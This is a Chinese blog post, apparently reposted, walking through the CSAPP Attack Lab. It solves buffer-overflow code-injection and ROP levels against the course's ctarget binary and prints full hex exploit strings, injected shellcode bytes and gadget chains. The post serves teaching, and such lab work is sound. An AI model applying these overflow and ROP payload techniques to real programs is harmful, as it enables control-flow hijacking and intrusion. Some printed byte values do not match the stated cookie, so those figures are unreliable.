CSAPP:Attack lab

关注公号【逆向通信猿】更精彩!!!

原文地址:https://www.jianshu.com/p/db731ca57342

本文介绍的是CSAPP书籍中的第三个lab: Attack lab。通过这个lab我们能够更加清楚和深入的了解到缓冲区溢出的隐患,以及如何利用缓冲区溢出这个漏洞对现有程序进行控制流劫持,执行非法程序代码,和对程序进行攻击以及破坏。

现在让我来揭开这个lab的每一层面纱:

Prerequire

(1)阅读《深入理解计算机系统》的3.10.2~3.10.5
(2)仔细阅读Attack lab的writeup
(3)熟练掌握gdb的使用,请参考gdb cheat sheet
(4)熟练x86-64下汇编的使用,详细请参考x64 cheat sheet

当然除了上面所必须了解的知识之外,我还建议大家看看cmu公开课Introducation to Computer System中的Recitation 5: Attack lab and Stack。一开始拿到这个lab的时候,我是对于这个lab如何下手并不是很明确,看完这个Recitation才比较明白了如何做。

知识预热

C语言中对于数组的引用不进行任何边界检查,而且局部变量和状态信息(如保存的寄存器值和返回地址)都存放在栈中。当对越界的数组元素的写操作时,则会破坏存储在栈中的状态信息。一种常见的破坏就是缓冲区溢出。通常,在栈中分配某个字符数组保存一个字符串,但是字符串的长度超出了为数组分配的空间。

程序示例:

/** echo.c  参照书籍中的代码*/#include <stdio.h>
#include <stdlib.h>void explosion(){printf("!!!You touch the explosion");exit(0);
}/* Implementation of library function gets() */
char *custom_gets(char *s){int c;char *dest = s;while((c = getchar()) != '\n' && c != EOF)*dest++ = c;if(c == EOF && dest == s)/* No characters read */return NULL;*dest++ = '\0'; /* Terminate string */return s;
}/** Read input line and write it back */
void echo(){char buf[8];custom_gets(buf);puts(buf);
}int main(int argc, char* argv[]){echo();return 0;
}

gets的问题是它没有办法为确保整个字符串分配了足够的空间。在echo示例中,我们故意将缓冲区设的非常小–只有8字节。任何长度超过7个字符的字符串都会导致写越界。

检查GCC为echo 产生的汇编代码,看看栈是如何组织的:

使用如下命令可以从c源文件生成汇编代码

linux> gcc -fno-asynchronous-unwind-tables -fno-stack-protector -O1 -S echo.c
  • -fno-asynchronous-unwind-tables选项是用来不生成CFI指令
  • -fno-stack-protector选项阻止进行栈破坏检测,默认是允许使用栈保护者
  • -O1 不做任何优化处理
  • -S 生成汇编代码即结束
/** void echo() */
echo:subq    $24, %rspmovq    %rsp, %rdicall    custom_getsmovq    %rsp, %rdicall    putsaddq    $24, %rspret

从汇编代码中可以看出,该程序在栈上为字符数组分配了24个字节。所以用户定义的字符数组为8个字节,意味着即使用户输入超过8个字节也不一定会对栈的状态信息造成破坏。但是如果用户输入超过23个字节,则会将echo的返回地址给破坏,这就是缓冲区溢出漏洞。

在这里插入图片描述

准备工作

从csapp的student site中下载下来整个lab,并且解压整个文件,可利用如下命令:

wget http://csapp.cs.cmu.edu/3e/target1.tar
tar -xvf target1.tar

大致浏览一下整个lab的目录,一共6个文件:

  • cookie.txt 一个8为16进行数,作为攻击的特殊标志符
  • farm.c 在ROP攻击中作为gadgets的产生源
  • ctarget 代码注入攻击的目标文件
  • rtarget ROP攻击的目标文件
  • hex2row 将16进制数转化为攻击字符,因为有些字符在屏幕上面无法输入,所以输入该字符的16进制数,自动转化为该字符

代码注入攻击

level 1

对于第一阶段,我们并不需要进行代码注入,我们需要做的就是劫持程序流,将函数的正常返回地址给重写,将函数重定向到我们指定的特定函数。在这个阶段中,我们要重定向到touch1函数。

解题思路:

  • 找到程序在栈为输入字符串分配了多大的空间
  • 找到touch1函数的起始地址
  • 将栈上分配的空间填满,并且在下8个字节,也就原先正常的返回地址上填上touch1函数的地址

ctarget 的正常流程如下:

void test()
{int val;val = getbuf();printf("No exploit. Getbuf returned 0x%x\n", val);
}

正常的流程是调用getbuf,然后从屏幕中输入字符串,如果正常退出的话,则会执行第5行代码。

void touch1() {vlevel = 1;printf("Touch!: You called touch1()\n");validate(1);exit(0);
}

现在的流程是调用getbuf,从屏幕输入字符串,然后程序返回到touch1.

(1) 利用gdb 调试ctarget找到我们需要的信息

linux> gdb ctarget

(2) 反汇编getbuf函数,找到实际在栈上分配了多少字节

(gdb)> disas getbuf0x00000000004017a8 <+0>:     sub    $0x28,%rsp0x00000000004017ac <+4>:     mov    %rsp,%rdi0x00000000004017af <+7>:     callq  0x401a40 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:    retq

从第一行sub $0x28, %rsp中显示,在栈上为buf提供了0x28也就是40个字节的空间

(3)反汇编touch1函数,找到touch1函数的起始地址

(gdb)> disas touch10x00000000004017c0 <+0>:     sub    $0x8,%rsp0x00000000004017c4 <+4>:     movl   $0x1,0x202d0e(%rip)0x00000000004017ce <+14>:    mov    $0x4030c5,%edi0x00000000004017d3 <+19>:    callq  0x400cc0 <puts@plt>0x00000000004017d8 <+24>:    mov    $0x1,%edi0x00000000004017dd <+29>:    callq  0x401c8d <validate>0x00000000004017e2 <+34>:    mov    $0x0,%edi0x00000000004017e7 <+39>:    callq  0x400e40 <exit@plt>

从第一行中看出,touch1的返回地址是0x00000000004017c0

以上,我们已经到了我们需要的所有关键信息,现在构建我们输入字符,首先填充栈,可以使用任意字符,这里我使用的是16进制的0x00填充,然后填充touch1地址,最后得到是如下结果:

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00       <----- touch1的起始地址

注意的是字节序的问题,大部分电脑应该都是little-endian字节序,即低位在低地址,高位在高地址。
在这里插入图片描述
使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level1.txt | ./ctarget -q

在这里插入图片描述

level 2

第二阶段,我们需要做的就是在输入字符串中注入一小段代码。其实整体的流程还是getbuf中输入字符,然后拦截程序流,跳转到调用touch2函数。首先,我们先查看一遍touch2函数所做事情:

void touch2(unsigned val){vlevel = 2;if (val == cookie){printf("Touch2!: You called touch2(0x%.8x)\n", val);validate(2);} else {printf("Misfire: You called touch2(0x%.8x)\n", val);fail(2);}exit(0);
}

这段程序就是验证传进来的参数val是否和cookie中值相等。本文中我的cookie值为:0x59b997fa

解题思路:

  • 将正常的返回地址设置为你注入代码的地址,本次注入直接在栈顶注入,所以即返回地址设置为%rsp的地址
  • 将cookie值移入到%rdi,%rdi是函数调用的第一个参数
  • 获取touch2的起始地址
  • 想要调用touch2,而又不能直接使用call,jmp等指令,所以只能使用ret改变当前指令寄存器的指向地址。ret是从栈上弹出返回地址,所以在次之前必须先将touch2的地址压栈

综上所述,可以得到注入的代码为:

/** inject.s */  注入的代码
movq    $0x59b997fa, %rdi
pushq   0x4017ec
ret

我们需要将上述的汇编代码转化为计算机可以执行的指令序列,执行下列命令:

linux> gcc -c inject.s
linux> objdump -d inject.oDisassembly of section .text:0000000000000000 <.text>:0:   48 c7 c7 fa 97 69 59    mov    $0x596997fa,%rdi7:   68 ec 17 40 00          pushq  $0x4017ecc:   c3                      retq

可以得到这三条指令序列如下:

48 c7 c7 fa 97 69 59 68 ec 17 40 00 c3

接下来就是寻找%rsp的地址,利用gdb进行调试,获取我们需要的信息:

linux> gdb ctarget(gdb)> break getbuf
(gdb)> run -q
(gdb)> disas
=> 0x00000000004017a8 <+0>:     sub    $0x28,%rsp0x00000000004017ac <+4>:     mov    %rsp,%rdi0x00000000004017af <+7>:     callq  0x401a40 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:    retq(gdb)> stepi
(gdb) p /x $rsp
$1 = 0x5561dc78

如上所示,我们获取到了%rsp的地址,结合上文所讲,可以构造出如下字符串,在栈的开始位置为注入代码的指令序列,然后填充满至40个字节,在接下来的8个字节,也就是原来的返回地址,填充成注入代码的起始地址,也就是%rsp的地址,可以得到如下字符串:

48 c7 c7 fa 97 b9 59 68 ec 17 
40 00 c3 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 
78 dc 61 55 00 00 00 00      <--- 注入代码的起始地址

在这里插入图片描述
使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level2.txt | ./ctarget -q

在这里插入图片描述

level 3

第三阶段,也是需要在输入的字符串中注入一段代码,但是不同于第二阶段的是,在这一阶段中我们需要传递字符串作为参数。

在这一段中我们需要劫持控制流,在正常返回的时候,跳转到touch3函数,其中touch3函数的代码如下:

void touch3(char *sval){vlevel = 3;if (hexmatch(cookie, sval)){printf("Touch3!: You called touch3(\"%s\")\n", sval);validate(3);} else {printf("Misfire: You called touch3(\"%s\")\n", sval);fail(3);}exit(0);
}

在touch3函数中调用了hexmatch函数,这个函数的功能是匹配cookie和传进来的字符是否匹配。在本文中cookie的值是0x59b997fa,所以我们传进去的参数应该是"59b997fa"。

int hexmatch(unsigned val, char *sval){char cbuf[110];char *s = cbuf + random() % 100;sprintf(s, "%.8x", val);return strncmp(sval, s, 9) == 0;
}

Some Advice

在C语言中字符串是以\0结尾,所以在字符串序列的结尾是一个字节0
man ascii 可以用来查看每个字符的16进制表示
当调用hexmatch和strncmp时,他们会把数据压入到栈中,有可能会覆盖getbuf栈帧的数据,所以传进去字符串的位置必须小心谨慎。
对于传进去字符串的位置,如果放在getbuf栈中,因为:

char *s = cbuf + random() % 100;

s的位置是随机的,所以之前留在getbuf中的数据,则有可能被hexmatch所重写,所以放在getbuf中并不安全。为了安全起见,我们把字符串放在getbuf的父栈帧中,也就是test栈帧中。

解题思路:

  • 将cookie字符串转化为16进制
  • 将字符串的地址传送到%rdi中
  • 和第二阶段一样,想要调用touch3函数,则先将touch3函数的地址压栈,然后调用ret指令。

综上所述,可以得到注入的代码为:

/** inject.s */  注入的代码
movq    $0x5561dca8, %rdi
pushq   0x4018fa
ret

我们需要将上述的汇编代码转化为计算机可以执行的指令序列,执行下列命令:

linux> gcc -c inject.s
linux> objdump -d inject.oDisassembly of section .text:0000000000000000 <.text>:0:   48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi7:   68 fa 18 40 00          pushq  $0x4018fac:   c3                      retq

可以得到这三条指令序列如下:

48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3

使用man ascii命令,可以得到cookie的16进制数表示:

35 39 62 39 39 37 66 61 00

在这里插入图片描述
根据上述,我们可以得到最后输入字符的序列如下:

48 c7 c7 a8 dc 61 55 68 fa 18 
40 00 c3 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 35 39
62 39 39 37 66 61 00

使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level3.txt | ./ctarget -q

在这里插入图片描述

ROP攻击

缓冲区溢出攻击的普遍发生给计算机系统造成了许多麻烦。现代的编译器和操作系统实现了许多机制,以避免遭受这样的攻击,限制入侵者通过缓冲区溢出攻击获得系统控制的方式。

(1)栈随机化

栈随机化的思想使得栈的位置在程序每次运行时都有变化。因此,即使许多机器都运行同样的代码,它们的栈地址都是不同的。上述3个阶段中,栈的地址是固定的,所以我们可以获取到栈的地址,并跳转到栈的指定位置。

(2)栈破坏检测

最近的GCC版本在产生的代码加入了一种栈保护者机制,来检测缓冲区越界。其思想是在栈帧中任何局部缓冲区和栈状态之间存储一个特殊的金丝雀值。在恢复寄存器状态和从函数返回之前,程序检查这个金丝雀值是否被该函数的某个操作或者该函数调用的某个操作改变了。如果是的,那么程序异常中止。

(3)限制可执行代码区域

最后一招是消除攻击者向系统中插入可执行代码的能力。一种方法是限制哪些内存区域能够存放可执行代码。

在ROP攻击中,因为栈上限制了不可插入可执行代码,所以不能像上述第二、第三阶段中插入代码。所以我们需要在已经存在的程序中找到特定的指令序列,并且这些指令是以ret结尾,这一段指令序列,我们称之为gadget。
在这里插入图片描述
每一段gadget包含一系列指令字节,而且以ret结尾,跳转到下一个gadget,就这样连续的执行一系列的指令代码,对程序造成攻击。

示例

void setval_210(unsigned *p)
{*p = 3347663060U;
}

对于上述代码,进行反汇编我们可以得到如下的执行序列,从中我们一个得到一个有趣指令序列:

0000000000400f15 <setval_210>:400f15: c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi)400f1b: c3 retq

其中,字节序列48 89 c7是对指令movq %rax, %rdi的编码,就这样我们可以利用已经存在的程序,从中提取出特定的指令,执行特定的功能,地址为0x400f18,其功能是将%rax的内容移到%rdi。

指令的编码如下所示:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

level 2

在这一阶段中,我们其实是重复代码注入攻击中第二阶段的任务,劫持程序流,返回到touch2函数。只不过这个我们要做的是ROP攻击,这一阶段我们无法再像上一阶段中将指令序列放入到栈中,所以我们需要到现有的程序中,找到我们需要的指令序列。

我们需要的代码序列如下:

popq %rax
movq %rax, %rdi

popq %rax的指令字节为:58,所以我们找到了如下函数:

00000000004019a7 <addval_219>:4019a7: 8d 87 51 73 58 90     lea    -0x6fa78caf(%rdi),%eax4019ad: c3 

从中我们可以得出popq %rax指令的地址为:0x4019ab

movq %rax, %rdi的指令字节为:48 89 c7,所以我们找到了如下函数:

00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax4019a6: c3  

从中我们可以得出movq %rax, %rdi指令的地址为:0x4019a2
在这里插入图片描述
综合上面所述,我们可以得到如下所述的字符串:

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00

使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level4.txt | ./ctarget -q

在这里插入图片描述

level 3

在这一阶段中,我们需要做的就是把字符串的起始地址,传送到%rdi,然后调用touch3函数。

因为每次栈的位置是随机的,所以无法直接用地址来索引字符串的起始地址,只能用栈顶地址 + 偏移量来索引字符串的起始地址。从farm中我们可以获取到这样一个gadget,lea (%rdi,%rsi,1),%rax,这样就可以把字符串的首地址传送到%rax。

解题思路:

(1)首先获取到%rsp的地址,并且传送到%rdi
(2)其二获取到字符串的偏移量值,并且传送到%rsi
(3)lea (%rdi,%rsi,1),%rax, 将字符串的首地址传送到%rax, 再传送到%rdi
(4)调用touch3函数

(1) 第一步,获取到%rsp的地址

0000000000401a03 <addval_190>:401a03: 8d 87 41 48 89 e0     lea    -0x1f76b7bf(%rdi),%eax401a09: c3  

movq %rsp, %rax的指令字节为:48 89 e0, 所以这一步的gadget地址为:0x401a06

(2) 第二步,将%rax的内容传送到%rdi

00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax4019a6: c3

movq %rax, %rdi的指令字节为:48 89 c7,所以这一步的gadget地址为:0x4019a2

(3) 第三步,将偏移量的内容弹出到%rax

00000000004019ca <getval_280>:4019ca: b8 29 58 90 c3        mov    $0xc3905829,%eax4019cf: c3   

popq %rax的指令字节为:58, 其中90为nop指令, 所以这一步的gadget地址为:0x4019cc

(4) 第四步,将%eax的内容传送到%edx

00000000004019db <getval_481>:4019db: b8 5c 89 c2 90        mov    $0x90c2895c,%eax4019e0: c3    

movl %eax, %edx的指令字节为:89 c2, 所以这一步的gadget地址为:0x4019dd

(5) 第五步,将%edx的内容传送到%ecx

0000000000401a6e <setval_167>:401a6e: c7 07 89 d1 91 c3     movl   $0xc391d189,(%rdi)401a74: c3  

movl %edx, %ecx的指令字节为:89 d1,所以这一步的gadget地址为:0x401a70

(6) 第六步,将%ecx的内容传送到%esi

0000000000401a11 <addval_436>:401a11: 8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax401a17: c3                    retq 

movl %ecx, %esi的指令字节为:89 ce, 所以这一步gadget地址为:0x401a13

(7) 第七步,将栈顶 + 偏移量得到字符串的首地址传送到%rax

00000000004019d6 <add_xy>:4019d6: 48 8d 04 37           lea    (%rdi,%rsi,1),%rax4019da: c3                    retq 

这一步的gadget地址为:0x4019d6

(8) 将字符串首地址%rax传送到%rdi

00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax4019a6: c3

movq %rax, %rdi的指令字节为:48 89 c7,所以这一步的gadget地址为:0x4019a2

整个栈的结构如下:
在这里插入图片描述
综上所述,我们可以得到字符串首地址和返回地址之前隔了9条指令,所以偏移量为72个字节,也就是0x48,可以的到如下字符串的输入:

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 
a2 19 40 00 00 00 00 00 
cc 19 40 00 00 00 00 00 
48 00 00 00 00 00 00 00 
dd 19 40 00 00 00 00 00 
70 1a 40 00 00 00 00 00 
13 1a 40 00 00 00 00 00 
d6 19 40 00 00 00 00 00 
a2 19 40 00 00 00 00 00 
fa 18 40 00 00 00 00 00 
35 39 62 39 39 37 66 61 00

使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level5.txt | ./ctarget -q

在这里插入图片描述

总结

在做完整个lab下来,感觉真的受益良多,对于栈的理解有了更加深层的理解;对于缓冲区溢出也是更深入的了解,对于以后编写更加安全的代码,能够更加关注这一点。

能够站在更加底层的方面审视代码,才能够更深刻的理解代码的原理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/347001.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

antlr java_使用ANTLR和Java创建外部DSL

antlr java在我以前的文章中&#xff0c;有一段时间我写了关于使用Java的内部DSL的文章。 在Martin Fowler撰写的《 领域特定语言 》一书中&#xff0c;他讨论了另一种称为外部DSL的DSL&#xff0c;其中DSL是用另一种语言编写的&#xff0c;然后由宿主语言进行解析以填充语义模…

【MFC系列-第7天】MFC类库封装原理

关注公号【逆向通信猿】更精彩&#xff01;&#xff01;&#xff01; 运算符重载 operator RECT* () {return this; }CString类库 例1 CString str;int n str.GetLength();::GetSystemDirectory(str.GetBuffer(1000), 1000);n str.GetLength();str.ReleaseBuffer();//必须…

【MFC系列-第8天】小型软件项目开发

第8天 小型软件项目开发 8.1 记事本开发 小技巧&#xff1a;用VC6新建工程&#xff0c;以资源方式打开系统自带notepad.exe中的MENU资源&#xff0c;加入到自己新建的工程中&#xff1b;然后再添加到VS工程中&#xff0c;即可获取现有exe的菜单资源。 EndDialog中传入的参数…

Spring休眠教程

1.简介 在本文中&#xff0c;我们将演示如何利用最流行的ORM&#xff08;对象关系映射&#xff09;工具之一的Hibernate的功能 &#xff0c;该工具可将面向对象的域模型转换为传统的关系数据库。 Hibernate是目前最流行的Java框架之一。 由于这个原因&#xff0c;我们在Java Co…

【MFC系列-第9天】MFC消息映射机制的原理

关注公号【逆向通信猿】更精彩&#xff01;&#xff01;&#xff01; 第9天 MFC消息映射机制的原理 9.1 对话框常用的回调函数 a)窗口创建时的消息和虚函数包括&#xff1a;WM_CREATE&#xff0c;WM_INITDIALOG,和PreSubclassWindow等&#xff1b; b)窗口关闭时的消息和虚函…

无状态会话的ejb_Java EE状态会话Bean(EJB)示例

无状态会话的ejb在本文中&#xff0c;我们将了解如何在简单的Web应用程序中使用状态会话Bean来跟踪客户端会话中的状态。 1.简介 有状态会话Bean通常保存有关特定客户端会话的信息&#xff0c;并在整个会话中保留该信息&#xff08;与无状态会话Bean相对&#xff09;。 有状态…

ArrayList源码学习笔记(3)

时隔两年&#xff0c;重新读ArrayList源码&#xff0c;轻松了很多&#xff0c;以问题的方式记录一下收获 装饰器模式 注释中提到ArrayList本身不是线程安全的&#xff0c;注释如下&#xff1a; * <p><strong>Note that this implementation is not synchronized.&…

【MFC系列-第10天】非模式对话框开发

10.1 程序左上角图标设置 通过SendMessage发送WM_SETICON消息来设置 10.2 纯Win32程序开发和技巧&#xff08;借助MFC源码&#xff09; 10.3 非模式对话框的调用 a)调用CDialog::Create函数来创建&#xff0c;并且调用ShowWindow来显示&#xff1b; b)单例模式每次判断句柄…

Maven教程之春

1.简介 在本文中&#xff0c;我们将演示如何针对非常特定的用例对Spring使用Maven依赖项。 我们使用的所有库的最新版本都可以在Maven Central上找到。 对于一个有效的构建周期而言&#xff0c;了解Maven依赖项的工作方式以及如何对其进行管理非常重要&#xff0c;并且对于在我…

【MFC系列-第11天】CWinApp类成员分析

11.1 资源管理器开发&#xff08;C语言&#xff09; 三种位运算 //#include <AtlBase.h> //混合 c_file.attrib | _A_HIDDEN|_A_RDONLY; //判断使用if(c_file.attrib & _A_HIDDEN) //删除属性c_file.attrib&~_A_HIDDENT;11.2 资源管理器开发&#xff08;API&a…

【MFC系列-第12天】Windows系统对话框

12.1 INI配置文件 UINT GetProfileInt( LPCTSTR lpszSection, LPCTSTR lpszEntry, int nDefault ); 从应用程序的配置文件&#xff08;.INI&#xff09;的一个配置项中获取一个整数 CString GetProfileString(LPCTSTR szSection, LPCTSTR szEntry, LPCTSTR szDefault NULL )…

【BCH码2】BCH码的快速BM迭代译码原理详解及MATLAB实现(不使用MATLAB库函数【全部代码需私信另外付费获取】)

理论基础 订阅《信道编码》专栏,首先查阅各子程序的详解 【有限域生成】本原多项式生成有限域的原理及MATLAB实现 【有限域除法】二元多项式除法电路原理及MATLAB详解 【有限域元素加法和乘法】有限域元素加法和乘法的原理及MATLAB实现 【多元域乘法】多项式乘法电路原理…

【MFC系列-第13天】Windows系统对话框(对话框记事本逻辑)

13.1 内存泄露问题 真正的内存泄露是有循环性反复申请而不释放内存&#xff1a;是指在软件运行时&#xff0c;比如点一下某按钮就申请一次堆空间&#xff0c;而在下次申请前或者适当的时机及时释放内存&#xff1b; Detected memory leaks! Dumping objects -> {225} norm…

js 实现轻量ps_简单轻量的池实现

js 实现轻量ps对象池是包含指定数量的对象的容器。 从池中获取对象时&#xff0c;在将对象放回之前&#xff0c;该对象在池中不可用。 池中的对象具有生命周期&#xff1a;创建&#xff0c;验证&#xff0c;销毁等。池有助于更好地管理可用资源。 有许多使用示例。 特别是在应用…

【MFC系列-第14天】MFC核心类库的成员介绍(记事本快捷键)

14.1 对话框快捷键的设置和加载 a) 插入一个新的Accelerator到资源里&#xff0c;把加速键和对应的响应控件(如一个按钮)关联 b) 在对话框头文件中声明 HACCEL m_hAccel;c) 在对话框的构造函数里初始化m_hAccel m_hAccel ::LoadAccelerators(AfxGetInstanceHandle(),MAKEI…

【MFC系列-第15天】关联变量的概念与用法

15.1 权限管理对话框的信息录入与保存 15.2 控件型关联变量&#xff1a; FromHandle和DeleteTempMap管理成员对象表&#xff0c;前者由HWND获取CWnd*&#xff0c;后者进行删除。 BOOL Attach( HWND hWndNew ); //关联 HWND Detach( ); //解除关联 BOOL SubclassWindow( HWND…

【MFC系列-第16天】企业信息管理软件开发

常见的两种类和类之间相互调用的方法。 16.1 用户权限信息在不同对话框之间共享 ①在CWokerApp类中定义变量&#xff1a; class CWorkerApp : public CWinApp { public:CWorkerApp();SAdmin m_admin;//登录信息 // 重写 public:virtual BOOL InitInstance(); // 实现DECLARE…

java微妙_编码Java时的10个微妙的最佳实践

java微妙这是10条最佳实践的列表&#xff0c;这些最佳实践比您的平均Josh Bloch有效Java规则要微妙得多。 尽管Josh Bloch的列表很容易学习&#xff0c;并且涉及日常情况&#xff0c;但此处的列表包含了涉及API / SPI设计的较不常见的情况&#xff0c;尽管这些情况可能会产生很…

【MFC系列-第17天】企业信息管理软件开发

关注公号【逆向通信猿】更精彩&#xff01;&#xff01;&#xff01; 17.1 数值型关联变量&#xff1a; a)在MFC中有部分控件支持数值型关联变量&#xff1a; 编辑控件、下拉控件、单选按钮、复选框以及日期控件&#xff1b; b)在类向导中为控件建立关联变量时&#xff0c;选…

GraphQL在Wildfly群上

“ GraphQL是API的查询语言&#xff0c;是用于使用现有数据完成这些查询的运行时。 GraphQL为您的API中的数据提供了一个完整且易于理解的描述&#xff0c;使客户能够准确地询问他们所需的内容&#xff0c;仅此而已&#xff0c;使随着时间的推移更容易开发API并启用强大的开发人…